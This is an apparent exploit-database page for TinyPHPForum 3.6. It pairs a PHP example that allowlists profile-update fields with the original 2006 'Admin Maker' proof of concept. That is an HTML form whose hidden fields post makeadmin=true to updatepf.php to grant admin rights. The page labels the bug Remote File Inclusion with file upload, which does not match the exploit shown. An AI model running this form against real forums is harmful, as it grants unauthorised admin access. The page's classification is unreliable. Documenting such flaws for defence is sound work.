Vendor: TinyPHPForum 3.6
By: SirDarckCat
CVSS: 9,3 (HIGH)
Type: Remote File Inclusion
CWE: 98
Product Name: TinyPHPForum 3.6
Affected Version From: 3.6
Affected Version To: 3.6
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

TinyPHPForum 3.6 Admin Maker

This exploit allows an attacker to inject malicious code into a vulnerable web application. TinyPHPForum 3.6 does not properly validate user-supplied input, so an attacker who sends a specially crafted request to the application can upload a malicious file to the server and execute it.

Mitigation:

The application should validate user-supplied input to prevent malicious code from being uploaded to the server.
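
One way to apply this mitigation to a profile-update handler, as an added example that is not TinyPHPForum's code: privilege fields are accepted only from an admin session, and every other field is allowlisted and validated. The field names are those in the proof-of-concept form on this page; the session keys and the function name are hypothetical.

```php
<?php
declare(strict_types=1);

// Added example, not TinyPHPForum code. Field names come from the form on
// this page; the session keys and function name are hypothetical.
const SELF_EDITABLE = ['email', 'ulang', 'uskin']; // any logged-in user
const ADMIN_ONLY    = ['makeadmin', 'stat'];       // privilege / account state

function filter_profile_update(array $post, array $session): array
{
    // Identity and role come from the server-side session, never the request.
    $actor   = $session['user'] ?? null;
    $isAdmin = ($session['is_admin'] ?? false) === true;
    if (!is_string($actor) || $actor === '') {
        throw new RuntimeException('not logged in');
    }
    // Target defaults to the caller; only an admin may name another account.
    $target = is_string($post['uname'] ?? null) ? $post['uname'] : $actor;
    if ($target !== $actor && !$isAdmin) {
        throw new RuntimeException('cannot edit another account');
    }
    $allowed = $isAdmin ? array_merge(SELF_EDITABLE, ADMIN_ONLY) : SELF_EDITABLE;
    $clean   = ['uname' => $target];
    foreach ($allowed as $field) {
        // Absent or non-string (array-typed) input is dropped.
        if (is_string($post[$field] ?? null)) {
            $clean[$field] = $post[$field];
        }
    }
    if (isset($clean['email'])
        && filter_var($clean['email'], FILTER_VALIDATE_EMAIL) === false) {
        throw new InvalidArgumentException('invalid email');
    }
    // Assumption: language and skin names may reach a file path, so they are
    // limited to a plain token (the page classifies the bug as CWE-98).
    foreach (['ulang', 'uskin'] as $f) {
        if (isset($clean[$f]) && !preg_match('/^[A-Za-z0-9_-]{1,32}$/', $clean[$f])) {
            throw new InvalidArgumentException("invalid $f");
        }
    }
    return $clean;
}

// Constructed request: the form's fields sent from a non-admin session.
$post = ['uname' => 'alice', 'email' => 'alice@example.org', 'makeadmin' => 'true',
         'stat' => 'true', 'ulang' => 'en', 'uskin' => 'default'];
var_dump(filter_profile_update($post, ['user' => 'alice', 'is_admin' => false]));
```

For the non-admin session in the sample, the returned array contains no `makeadmin` or `stat` key, so the caller has nothing privilege-related to write back to the account.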

Exploit-DB raw data:

TinyPHPForum 3.6 Admin Maker<br>
By SirDarckCat from elhacker.net

<FORM method=post enctype="multipart/form-data">
Existing User:<INPUT name=uname><br>
<INPUT type=file name=userfile style="visibility:HIDDEN"><br>
<INPUT type=hidden name=email value="a@b.c">
<input type=hidden name=makeadmin value=true>
<input type=hidden name=stat value=true>
<input type=hidden name=ulang value=en>
<input type=hidden name=uskin value=default>
<INPUT type=submit>
</FORM>

<script language="JavaScript">
document.forms[0].action=prompt("Path to forum","http://www.server.com/tpf/")+"updatepf.php";
</script>

# milw0rm.com [2006-08-02]